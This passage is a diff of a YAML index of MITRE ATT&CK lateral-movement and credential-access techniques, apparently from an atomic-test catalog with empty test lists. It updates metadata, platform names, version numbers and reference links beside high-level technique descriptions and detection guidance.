       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -41945,7 +42626,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -41999,11 +42679,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42055,14 +42734,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42148,12 +42826,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42173,6 +42850,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42180,7 +42858,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42196,39 +42873,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42253,12 +42931,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42272,13 +42949,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42295,7 +42971,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42343,7 +43019,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42376,7 +43052,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42415,7 +43090,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42449,12 +43124,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -42482,10 +43155,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -42515,7 +43187,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -42577,12 +43248,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42606,11 +43276,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -42635,9 +43304,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -42697,7 +43365,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -42752,7 +43419,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -42820,12 +43486,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -42882,6 +43547,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -42892,13 +43558,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -42957,7 +43622,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43051,49 +43715,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43108,20 +43733,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43201,12 +43863,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43235,6 +43896,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43246,18 +43908,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43284,14 +43946,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43415,12 +44074,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43435,10 +44093,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -43446,14 +44105,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -43496,14 +44155,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -43558,14 +44214,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43616,14 +44271,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -43657,8 +44311,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -43675,11 +44329,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -43697,7 +44350,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -43714,10 +44367,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43741,46 +44394,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
